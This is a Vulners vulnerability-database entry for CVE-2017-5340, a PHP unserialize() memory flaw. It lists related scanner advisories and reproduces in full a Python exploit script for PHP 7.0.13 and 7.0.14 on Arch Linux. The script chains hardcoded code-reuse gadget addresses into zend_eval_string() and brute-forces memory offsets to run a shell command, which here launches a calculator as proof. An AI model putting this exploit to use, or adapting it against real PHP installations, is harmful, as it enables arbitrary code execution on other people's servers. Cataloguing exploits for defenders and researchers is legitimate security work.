Vulners
Lucene search
PHP Use of uninitialized memory in unserialize() (CVE-2017-5340)
| Reporter | Title | Published | Views | Family All 54 |
|---|---|---|---|---|
 | PHP 7.0.x < 7.0.15 / 7.1.x < 7.1.1 Multiple Vulnerabilities | 3 Feb 201700:00 | – | nessus |
| Amazon Linux AMI : php70 (ALAS-2017-812) | 30 Mar 201700:00 | – | nessus |
| MiracleLinux 7 : rh-php70-php-7.0.27-1.el7 (AXSA:2018-3021:01) | 16 Jan 202600:00 | – | nessus |
| openSUSE Security Update : php7 (openSUSE-2017-304) | 7 Mar 201700:00 | – | nessus |
| PHP 7.0.x < 7.0.15 Multiple Vulnerabilities | 26 Jan 201700:00 | – | nessus |
| PHP 7.1.x < 7.1.1 Multiple Vulnerabilities | 26 Jan 201700:00 | – | nessus |
| RHEL 6 / 7 : rh-php70-php (RHSA-2018:1296) | 27 Apr 202400:00 | – | nessus |
| RHEL 5 : php (Unpatched Vulnerability) | 11 May 202400:00 | – | nessus |
| RHEL 6 : php (Unpatched Vulnerability) | 11 May 202400:00 | – | nessus |
| RHEL 7 : php (Unpatched Vulnerability) | 11 May 202400:00 | – | nessus |
10
#!/usr/bin/python3
"""
*******************************
> Archlinux PHP-7.0.13 x86_64 <
> Archlinux PHP-7.0.14 x86_64 <
> unserialize exploit <
*******************************
rc0r <[email protected]>
"""
import struct
import subprocess
import sys
# addresses of COP gadgets, order matters!
# 7.0.13
gadgets = [
0x67df50, # &zend_eval_string()
0x653a1d, # lea rdi, [rbp + 0x90]; call rax
0xbb844a, # xchg eax, ebx; call rdx
]
# 7.0.14
gadgets = [
0x67ed30, # &zend_eval_string()
0x653ddd, # lea rdi, [rbp + 0x90]; call rax
0xc61f52, # xchg eax, ebx; call rdx
]
# in case exploitation does not work from scratch
# decrease off_start and try again
# fast but, more unreliable params:
# off_start = 0x3d60
# off_end = 0x3f6c
# slower, but quite reliable
off_start = 0x3000
off_end = 0x4f00
off_step = 0x8
def construct_payload(master_payload, current_offset, gadgets, eval_string):
master_payload_len = len(master_payload)
payload = master_payload[:current_offset]
payload += struct.pack('<QQ', gadgets[0], gadgets[1])
payload += struct.pack('<16B', *((0x30, ) * 16))
payload += struct.pack('<Q', gadgets[2])
payload += struct.pack('<88B', *((0x30, ) * 88))
payload += struct.pack('<{}s'.format(len(eval_string)), eval_string.encode('UTF-8'))
payload += struct.pack('<B', 0x00)
remaining_len = master_payload_len - len(payload)
payload += struct.pack('<{}B'.format(remaining_len), *((0x30, ) * remaining_len))
return payload
def exploit(master_payload):
# argument to zend_eval_string
eval_string = '`gnome-calculator`;'
sys.stdout.write(' [')
sys.stdout.flush()
for offset in range(off_start, off_end, off_step):
payload = construct_payload(master_payload, offset, gadgets, eval_string)
fn = './gen.payload'
with open(fn, 'wb') as f:
f.write(payload)
cmd = ['/usr/bin/php', './test.php', fn]
subprocess.run(cmd, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
sys.stdout.write('.')
sys.stdout.flush()
print(']')
def main():
with open('payload.master', 'rb') as f:
master_payload = f.read()
exploit(master_payload)
if __name__ == '__main__':
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jan 2017 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.1669